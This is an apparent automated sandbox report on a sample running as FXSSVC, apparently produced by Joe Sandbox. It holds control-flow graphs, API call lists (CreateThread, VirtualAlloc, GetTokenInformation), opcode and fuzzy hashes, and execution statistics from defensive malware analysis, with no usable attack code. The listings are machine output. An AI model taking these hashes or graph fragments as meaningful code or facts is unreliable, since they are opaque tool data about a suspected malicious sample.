                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 23B11F3060DE55CBC729CB1C548127A77A1FF99314FA8929FD88787266DE2D9C03835B
                                                                                                                                                                                                                                                                                                                                                                                          Function 00425B8F Relevance: 4.7, APIs: 3, Instructions: 161threadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 131 425b8f-425c20 call 4353f0 call 458358 call 440320 call 4281c0 141 425c26 131->141 142 425cf4-425d08 call 4572ec 131->142 141->142 144 425c2c-425c2f 141->144 146 425c87-425dc8 call 425e60 call 425990 142->146 147 425d0e 142->147 159 425dcd 146->159 147->146 148 425d14-425d18 147->148 152 425c65 148->152 153 425daf-425db6 call 4252d0 148->153 156 425ca3 call 425df0 152->156 157 425c67 152->157 165 425c30-425c39 153->165 166 425dbc 153->166 173 425c45-425d6d call 441520 156->173 157->156 160 425c69-425c72 157->160 159->159 163 425c97-425c9d 160->163 164 425c78 160->164 187 425c85 163->187 188 425c9f 163->188 168 425c7e 164->168 169 425d1f-425d45 164->169 184 425bf7 165->184 185 425cb9-425cbd 165->185 170 425dbe 166->170 171 425d7d-425d89 166->171 168->169 177 425c84-425d5b CreateThread 168->177 195 425d47 169->195 196 425cd4-425cea CreateThread CloseHandle 169->196 170->171 183 425d9b 170->183 180 425d94 171->180 181 425d8b-425d92 171->181 192 425bfd-425c06 173->192 201 425d73 173->201 177->164 180->144 199 425cb3 180->199 181->180 189 425d9c 181->189 183->189 184->185 184->192 193 425cc3 185->193 194 425d56-425d5b CreateThread 185->194 187->146 188->187 197 425ca1 188->197 204 425da5-425da8 189->204 192->204 193->194 200 425cc9 193->200 194->164 195->196 196->181 202 425cf0-425d4d 196->202 197->156 199->144 199->185 200->194 201->192 206 425d79-425d7b 201->206 202->180 204->153 206->171
                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1725543525.0000000000420000.00000040.00001000.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_420000_FXSSVC.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CreateThread
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2422867632-0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 98ad4f1ecaba1b1ea26a62891c6d47ab910c8725483cf31499e5227f5de8182e
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 105c14e57bbe2a20819356ff84f4e076505607b6fc70625168c2f6d77fb7281b
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 98ad4f1ecaba1b1ea26a62891c6d47ab910c8725483cf31499e5227f5de8182e
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC410820728F398FD768972AB40D33A26D1EB55314FD441ABD406CB2A1EA7C8C06874F
                                                                                                                                                                                                                                                                                                                                                                                          Function 00425D22 Relevance: 4.5, APIs: 3, Instructions: 42threadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 208 425d22-425d45 209 425d47 208->209 210 425cd4-425cea CreateThread CloseHandle 208->210 209->210 211 425cf0-425d4d 210->211 212 425d8b-425d92 210->212 214 425d94 211->214 212->214 215 425d9c 212->215 218 425cb3 214->218 219 425c2c-425c2f 214->219 220 425da5-425db6 call 4252d0 215->220 218->219 221 425cb9-425cbd 218->221 232 425c30-425c39 220->232 233 425dbc 220->233 222 425cc3 221->222 223 425d56-425d5b CreateThread 221->223 222->223 226 425cc9 222->226 225 425c78 223->225 228 425c7e 225->228 229 425d1f-425d45 225->229 226->223 228->229 231 425c84-425d5b CreateThread 228->231 229->209 229->210 231->225 232->221 243 425bf7 232->243 235 425dbe 233->235 236 425d7d-425d89 233->236 235->236 242 425d9b 235->242 236->212 236->214 242->215 243->221 244 425bfd-425c06 243->244 244->220
                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1725543525.0000000000420000.00000040.00001000.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_420000_FXSSVC.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CreateThread$CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 738052048-0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 760f94599755da194dd29375a27335f1873d2ba13cc992e410e8a54c8ea46f33
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 1c8230a2eb981ff393e97a97b92db0fb30d945c4e69a5d3befe7b4714f1a8aa4
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 760f94599755da194dd29375a27335f1873d2ba13cc992e410e8a54c8ea46f33
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B4F0C22173CE2585DB2C962AB85923B61C1A799361FE4871B9017C92D4EA3C8902A20E
                                                                                                                                                                                                                                                                                                                                                                                          Function 00425D50 Relevance: 1.5, APIs: 1, Instructions: 8threadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 246 425d50-425d5b CreateThread 247 425c78 246->247 248 425c7e 247->248 249 425d1f-425d45 247->249 248->249 250 425c84 248->250 252 425d47 249->252 253 425cd4-425cea CreateThread CloseHandle 249->253 250->246 252->253 254 425cf0-425d4d 253->254 255 425d8b-425d92 253->255 257 425d94 254->257 255->257 258 425d9c 255->258 261 425cb3 257->261 262 425c2c-425c2f 257->262 263 425da5-425db6 call 4252d0 258->263 261->262 264 425cb9-425cbd 261->264 271 425c30-425c39 263->271 272 425dbc 263->272 265 425cc3 264->265 266 425d56-425d5b CreateThread 264->266 265->266 268 425cc9 265->268 266->247 268->266 271->264 280 425bf7 271->280 273 425dbe 272->273 274 425d7d-425d89 272->274 273->274 279 425d9b 273->279 274->255 274->257 279->258 280->264 281 425bfd-425c06 280->281 281->263
                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1725543525.0000000000420000.00000040.00001000.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_420000_FXSSVC.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CreateThread$CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 738052048-0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 7b23c4dad9cccc72c390ba8dfef486248ba2e75f4a7df7cd1f89f04c01369b0b
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: b6339ee052ab74e45394ecfbfa9780cc58f342633f9b7c36086998f7d2e7aa79
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b23c4dad9cccc72c390ba8dfef486248ba2e75f4a7df7cd1f89f04c01369b0b
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5BB09201239EA68502252731240812A05842A466349F49BAA9B7307AD2E9280C05632E
                                                                                                                                                                                                                                                                                                                                                                                          Function 00425990 Relevance: 1.4, APIs: 1, Instructions: 103COMMON
                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 283 425990-42599b 285 425a33-425a61 call 459b00 283->285 286 4259a1 283->286 296 425a63 285->296 297 425ab4-425aba call 441080 285->297 286->285 288 4259a7-4259ab 286->288 292 4259b1-4259f3 call 452320 288->292 293 425a59 288->293 292->293 312 4259f5-4259fa 292->312 294 425a25-425a2d 293->294 295 425a5b 293->295 300 425a70-425a7b 294->300 301 425a2f 294->301 295->294 309 425a23 295->309 296->297 304 425a65 296->304 315 425a83-425a88 call 425df0 297->315 318 425a13 297->318 307 425a16-425a1e call 441470 300->307 308 425a7d 300->308 301->304 304->300 324 425a96-425ac2 307->324 308->307 310 425a7f-425a81 308->310 311 425a24 309->311 310->315 316 425a51-425a54 call 45233c 312->316 317 4259fc 312->317 325 425a8d VirtualAlloc 315->325 316->293 317->316 321 4259fe-425a02 317->321 318->315 323 425a15 318->323 321->316 323->307 324->311 327 425ac8 324->327 325->324 327->311 328 425ace 327->328 328->285
                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1725543525.0000000000420000.00000040.00001000.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_420000_FXSSVC.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcscpy
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1284135714-0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: c955c7768020edb3d775754c7aa1ae957f516f6bf3db9d18962a2a84bb93b72c
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 5301dff3261b40f52b23e75ab60d64307709ea7da11dab68c04a07b62adf5307
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c955c7768020edb3d775754c7aa1ae957f516f6bf3db9d18962a2a84bb93b72c
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0921982172DEB48BD76A9318749727725A2B7A5324FD803CBD086C7392D93C4D45924F
                                                                                                                                                                                                                                                                                                                                                                                          Function 00428245 Relevance: 1.3, APIs: 1, Instructions: 44COMMON
                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 330 428245-428247 331 4282d2-4282d7 330->331 332 42824d-42824f 330->332 334 428306-428309 331->334 333 428251-428260 call 4572f4 332->333 344 428390-428393 333->344 336 42830b-428311 CloseHandle 334->336 337 42832e-428330 334->337 336->337 338 428332 337->338 339 4282dd-4282e3 337->339 338->339 341 428334 338->341 342 4283a3-4283a4 339->342 343 4282e9 339->343 345 42f524-42f52e 341->345 343->342 348 4282ef 343->348 346 428399 344->346 347 42827e 344->347 351 42f807 345->351 346->347 350 42839f-4283a1 346->350 347->336 349 428284 347->349 352 4282f0-42831c 348->352 349->337 350->342 353 42f8df-42f8e0 351->353 354 42f80d 351->354 363 428322 352->363 364 4281e5 352->364 357 4315a5-4315aa 353->357 354->353 356 42f813 354->356 361 42f81b 356->361 362 42f78f 356->362 360 4315ae-4315af 357->360 365 4315b2-4315b7 360->365 361->353 362->361 366 42f795 362->366 363->364 367 428328-42832c 363->367 368 4282a3-4282a5 364->368 369 4281eb 364->369 370 4315ba-4315c1 365->370 366->351 367->337 371 4282c5-4282c8 367->371 372 4282ab 368->372 373 4283f9 368->373 374 4282b2-4282bc 369->374 375 4281f1 369->375 376 431750-4317a2 call 4572f4 370->376 377 4315c7-4315d2 370->377 371->373 378 4282ce 371->378 372->373 379 4282b1 372->379 373->331 385 4283ff 373->385 374->371 384 428357-42836f GetTokenInformation 374->384 375->374 381 4281f7-42828e 375->381 382 431620-431623 377->382 383 4315d4-4315d6 377->383 388 4282d0 378->388 389 42828f-428303 call 4572ec 378->389 379->374 381->389 386 4316a0-4316b4 382->386 387 431625-431628 382->387 392 431670-431684 383->392 393 4315dc-4315df 383->393 400 428376-42837b 384->400 385->345 397 4316b6-4316b9 386->397 398 4316f4-4316f5 386->398 387->370 394 43162a-431636 387->394 388->331 388->389 389->334 422 42834f-428355 389->422 392->357 396 43168a-43168d 392->396 393->370 399 4315e1-4315f6 393->399 401 431638-431640 394->401 402 4316dc-4316ec 394->402 404 431693-431697 396->404 405 43172f-431738 396->405 406 4316bb 397->406 407 43173a-43173b 397->407 411 4316fe-43170c 398->411 408 4316d2-4316d7 399->408 409 4315fc-431600 399->409 400->352 410 428381 400->410 412 431646-43165f 401->412 413 43170e-431727 401->413 402->377 417 4316f2 402->417 416 4316bf-4316cd 404->416 414 43173f-431740 405->414 406->416 407->414 408->360 409->411 418 431606-431618 409->418 410->352 419 428387 410->419 421 431744-431748 411->421 412->377 424 431665 412->424 413->377 423 43172d 413->423 414->421 417->376 418->365 419->344 420 428277-42827a 419->420 425 428241 420->425 426 42827c 420->426 428 428212-42821a GetTokenInformation 422->428 429 428341 422->429 423->376 424->376 425->333 425->400 426->347 426->425 431 428220-428234 428->431 432 4283af 428->432 429->428 430 428347 429->430 430->401 435 42834d 430->435 439 4283d7-4283dd 431->439 440 42823a 431->440 432->333 433 4283b5 432->433 433->333 436 4283bb-4283ca 433->436 435->422 436->420 443 4283d0 436->443 440->439 442 428240 440->442 445 43b32e-43b330 442->445 443->420 448 4283d6 443->448 446 43b332-43b337 call 4572f4 445->446 447 43b300 445->447 446->447 454 43b339 446->454 452 43b302 447->452 453 43b2fd 447->453 448->439 455 43b305 453->455 456 43b2ff 453->456 454->447 457 43b33b-43b33f 454->457 458 43b322-43b32d 455->458 459 43b308-43b315 455->459 456->459 457->459 458->445 459->455 461 43b317 459->461 461->453
                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1725543525.0000000000420000.00000040.00001000.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_420000_FXSSVC.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: abeeb7420c1f47a5a155fc40ccd1a1890ae2ccf5a29964df3ea308a91953a94f
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 2230a71c37f606e3275c3ae52cc0225e72bf23885a3112329a9137899428871d
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: abeeb7420c1f47a5a155fc40ccd1a1890ae2ccf5a29964df3ea308a91953a94f
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 36F04F3470EA718BC6269718B05043FABB0AA51710BD900EFD846CB657CE1C9C06936A
                                                                                                                                                                                                                                                                                                                                                                                          Function 00428318 Relevance: 1.3, APIs: 1, Instructions: 36COMMON
                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 462 428318-42831c 463 428322 462->463 464 4281e5 462->464 463->464 465 428328-42832c 463->465 466 4282a3-4282a5 464->466 467 4281eb 464->467 468 4282c5-4282c8 465->468 469 42832e-428330 465->469 470 4282ab 466->470 471 4283f9 466->471 472 4282b2-4282bc 467->472 473 4281f1 467->473 468->471 476 4282ce 468->476 474 428332 469->474 475 4282dd-4282e3 469->475 470->471 477 4282b1 470->477 480 4282d2-4282d7 471->480 481 4283ff 471->481 472->468 479 428357-42836f GetTokenInformation 472->479 473->472 478 4281f7-42828e 473->478 474->475 483 428334 474->483 487 4283a3-4283a4 475->487 488 4282e9 475->488 484 4282d0 476->484 485 42828f-428303 call 4572ec 476->485 477->472 478->485 492 428376-42837b 479->492 489 428306-428309 480->489 482 42f524-42f52e 481->482 491 42f807 482->491 483->482 484->480 484->485 485->489 506 42834f-428355 485->506 488->487 493 4282ef 488->493 489->469 494 42830b-428311 CloseHandle 489->494 496 42f8df-42f8e0 491->496 497 42f80d 491->497 498 4282f0-42831c 492->498 499 428381 492->499 493->498 494->469 507 4315a5-4315aa 496->507 497->496 502 42f813 497->502 498->463 498->464 499->498 503 428387 499->503 515 42f81b 502->515 516 42f78f 502->516 504 428390-428393 503->504 505 428277-42827a 503->505 511 428399 504->511 512 42827e 504->512 509 428241 505->509 510 42827c 505->510 521 428212-42821a GetTokenInformation 506->521 522 428341 506->522 514 4315ae-4315af 507->514 509->492 524 428251-428260 call 4572f4 509->524 510->509 510->512 511->512 519 42839f-4283a1 511->519 512->494 518 428284 512->518 520 4315b2-4315b7 514->520 515->496 516->515 523 42f795 516->523 518->469 519->487 525 4315ba-4315c1 520->525 528 428220-428234 521->528 529 4283af 521->529 522->521 526 428347 522->526 523->491 524->504 532 431750-4317a2 call 4572f4 525->532 533 4315c7-4315d2 525->533 534 431638-431640 526->534 535 42834d 526->535 556 4283d7-4283dd 528->556 557 42823a 528->557 529->524 530 4283b5 529->530 530->524 539 4283bb-4283ca 530->539 541 431620-431623 533->541 542 4315d4-4315d6 533->542 537 431646-43165f 534->537 538 43170e-431727 534->538 535->506 537->533 546 431665 537->546 538->533 545 43172d 538->545 539->505 571 4283d0 539->571 543 4316a0-4316b4 541->543 544 431625-431628 541->544 550 431670-431684 542->550 551 4315dc-4315df 542->551 554 4316b6-4316b9 543->554 555 4316f4-4316f5 543->555 544->525 552 43162a-431636 544->552 545->532 546->532 550->507 553 43168a-43168d 550->553 551->525 558 4315e1-4315f6 551->558 552->534 559 4316dc-4316ec 552->559 560 431693-431697 553->560 561 43172f-431738 553->561 563 4316bb 554->563 564 43173a-43173b 554->564 568 4316fe-43170c 555->568 557->556 565 428240 557->565 566 4316d2-4316d7 558->566 567 4315fc-431600 558->567 559->533 574 4316f2 559->574 570 4316bf-4316cd 560->570 569 43173f-431740 561->569 563->570 564->569 573 43b32e-43b330 565->573 566->514 567->568 575 431606-431618 567->575 576 431744-431748 568->576 569->576 571->505 579 4283d6 571->579 577 43b332-43b337 call 4572f4 573->577 578 43b300 573->578 574->532 575->520 577->578 585 43b339 577->585 583 43b302 578->583 584 43b2fd 578->584 579->556 586 43b305 584->586 587 43b2ff 584->587 585->578 588 43b33b-43b33f 585->588 589 43b322-43b32d 586->589 590 43b308-43b315 586->590 587->590 588->590 589->573 590->586 592 43b317 590->592 592->584
                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNELBASE ref: 0042830B
                                                                                                                                                                                                                                                                                                                                                                                          • GetTokenInformation.KERNELBASE ref: 00428369
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1725543525.0000000000420000.00000040.00001000.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_420000_FXSSVC.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CloseHandleInformationToken
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3954737543-0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 77a015f8ebc331779973eb2bd4a9dafca6344b1b5edfd1b30c85a8ef24a0a0c6
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: e961fba32d1a1562996a88a92dc1d71db4a98c059d6e1fdd72eb63cffae70605
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 77a015f8ebc331779973eb2bd4a9dafca6344b1b5edfd1b30c85a8ef24a0a0c6
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 41F04F3470A575DBCA259A18B44053F66A0AA61750BE800AFC846CB352CF2DDC46E66F
                                                                                                                                                                                                                                                                                                                                                                                          Function 004283E7 Relevance: 1.3, APIs: 1, Instructions: 36COMMON
                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 593 4283e7-4283e9 594 4282c5-4282c8 593->594 595 4283ef 593->595 596 4283f9 594->596 597 4282ce 594->597 595->594 598 4283f5-4283f7 595->598 601 4282d2-4282d7 596->601 602 4283ff 596->602 599 4282d0 597->599 600 42828f-428303 call 4572ec 597->600 598->596 599->600 599->601 605 428306-428309 600->605 616 42834f-428355 600->616 601->605 603 42f524-42f52e 602->603 607 42f807 603->607 608 42830b-428311 CloseHandle 605->608 609 42832e-428330 605->609 613 42f8df-42f8e0 607->613 614 42f80d 607->614 608->609 610 428332 609->610 611 4282dd-4282e3 609->611 610->611 615 428334 610->615 617 4283a3-4283a4 611->617 618 4282e9 611->618 620 4315a5-4315aa 613->620 614->613 619 42f813 614->619 615->603 625 428212-42821a GetTokenInformation 616->625 626 428341 616->626 618->617 622 4282ef 618->622 627 42f81b 619->627 628 42f78f 619->628 624 4315ae-4315af 620->624 629 4282f0-42831c 622->629 630 4315b2-4315b7 624->630 633 428220-428234 625->633 634 4283af 625->634 626->625 631 428347 626->631 627->613 628->627 632 42f795 628->632 659 428322 629->659 660 4281e5 629->660 638 4315ba-4315c1 630->638 640 431638-431640 631->640 641 42834d 631->641 632->607 664 4283d7-4283dd 633->664 665 42823a 633->665 636 428251-428256 call 4572f4 634->636 637 4283b5 634->637 656 42825b-428260 636->656 637->636 644 4283bb-4283ca 637->644 645 431750-4317a2 call 4572f4 638->645 646 4315c7-4315d2 638->646 642 431646-43165f 640->642 643 43170e-431727 640->643 641->616 642->646 650 431665 642->650 643->646 648 43172d 643->648 689 4283d0 644->689 690 428277-42827a 644->690 653 431620-431623 646->653 654 4315d4-4315d6 646->654 648->645 650->645 657 4316a0-4316b4 653->657 658 431625-431628 653->658 662 431670-431684 654->662 663 4315dc-4315df 654->663 666 428390-428393 656->666 675 4316b6-4316b9 657->675 676 4316f4-4316f5 657->676 658->638 668 43162a-431636 658->668 659->660 667 428328-42832c 659->667 672 4282a3-4282a5 660->672 673 4281eb 660->673 662->620 671 43168a-43168d 662->671 663->638 677 4315e1-4315f6 663->677 665->664 678 428240 665->678 669 428399 666->669 670 42827e 666->670 667->594 667->609 668->640 683 4316dc-4316ec 668->683 669->670 685 42839f-4283a1 669->685 670->608 684 428284 670->684 686 431693-431697 671->686 687 43172f-431738 671->687 672->596 688 4282ab 672->688 679 4282b2-4282bc 673->679 680 4281f1 673->680 691 4316bb 675->691 692 43173a-43173b 675->692 695 4316fe-43170c 676->695 681 4316d2-4316d7 677->681 682 4315fc-431600 677->682 694 43b32e-43b330 678->694 679->594 706 428357-42836f GetTokenInformation 679->706 680->679 699 4281f7 680->699 681->624 682->695 700 431606-431618 682->700 683->646 707 4316f2 683->707 684->609 685->617 703 4316bf-4316cd 686->703 698 43173f-431740 687->698 688->596 704 4282b1 688->704 689->690 705 4283d6 689->705 701 428241 690->701 702 42827c 690->702 691->703 692->698 696 43b332-43b337 call 4572f4 694->696 697 43b300 694->697 708 431744-431748 695->708 696->697 717 43b339 696->717 714 43b302 697->714 715 43b2fd 697->715 698->708 710 42828e 699->710 700->630 701->636 712 428376-42837b 701->712 702->670 702->701 704->679 705->664 706->712 707->645 710->600 712->629 716 428381 712->716 719 43b305 715->719 720 43b2ff 715->720 716->629 718 428387 716->718 717->697 721 43b33b-43b33f 717->721 718->666 718->690 722 43b322-43b32d 719->722 723 43b308-43b315 719->723 720->723 721->723 722->694 723->719 725 43b317 723->725 725->715
                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1725543525.0000000000420000.00000040.00001000.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_420000_FXSSVC.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 503c1ad91aea7a5e0fd56d7a1d992a80918f029766c32a84f283e1e6ddad448d
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 6bc8ae829301df2f5c39c5b8946e9ae91c93d1cf9969dff47ee7a86ecba7dafe
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 503c1ad91aea7a5e0fd56d7a1d992a80918f029766c32a84f283e1e6ddad448d
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 49F0493470A975DB86259618B44053FA6B0AB61700BE800AFC846CB762CF2DAC46E76F

                                                                                                                                                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                                                                                                                                                          Execution Coverage:5.4%
                                                                                                                                                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                                                                                                                                                                                          Total number of Nodes:51
                                                                                                                                                                                                                                                                                                                                                                                          Total number of Limit Nodes:4
                                                                                                                                                                                                                                                                                                                                                                                          execution_graph 3870 22583e7 3873 22581e5 3870->3873 3871 225830b CloseHandle 3871->3873 3872 2258212 GetTokenInformation 3872->3873 3873->3871 3873->3872 3874 2258357 GetTokenInformation 3873->3874 3875 22581f7 3873->3875 3874->3873 3876 2255d50 CreateThread 3880 2255bbc 3876->3880 3877 2255cd4 CreateThread CloseHandle 3877->3880 3878 2255c2c 3879 2255d56 CreateThread 3879->3880 3880->3877 3880->3878 3880->3879 3949 22581e3 3952 22581e5 3949->3952 3950 2258357 GetTokenInformation 3950->3952 3951 225830b CloseHandle 3951->3952 3952->3950 3952->3951 3953 2258212 GetTokenInformation 3952->3953 3954 22581f7 3952->3954 3953->3952 3908 2255d22 3909 2255cd4 CreateThread CloseHandle 3908->3909 3910 2255bbc 3908->3910 3909->3910 3910->3909 3911 2255c2c 3910->3911 3912 2255d56 CreateThread 3910->3912 3912->3910 3881 2255b8f 3893 22653f0 3881->3893 3883 2255baf 3898 22581c0 3883->3898 3885 2255c2c 3886 2255c85 3904 2255990 3886->3904 3888 2255dcd 3888->3888 3889 2255bbc 3889->3885 3891 2255d56 CreateThread 3889->3891 3892 2255cd4 CreateThread CloseHandle 3889->3892 3890 2255c20 3890->3885 3890->3886 3890->3889 3891->3889 3892->3889 3894 22653f4 3893->3894 3895 226545e VirtualAlloc 3894->3895 3897 22653f6 3894->3897 3896 2265460 3895->3896 3896->3894 3897->3883 3901 22581e5 3898->3901 3899 2258357 GetTokenInformation 3899->3901 3900 225830b CloseHandle 3900->3901 3901->3890 3901->3899 3901->3900 3902 2258212 GetTokenInformation 3901->3902 3903 22581f7 3901->3903 3902->3901 3903->3890 3905 2255994 wcscpy 3904->3905 3906 2255a23 3905->3906 3907 2255a8d VirtualAlloc 3905->3907 3906->3888 3907->3905 3955 22558de 3956 22653f0 VirtualAlloc 3955->3956 3957 22558f9 3956->3957 3958 22581c0 3 API calls 3957->3958 3959 2255907 3958->3959

                                                                                                                                                                                                                                                                                                                                                                                          Executed Functions

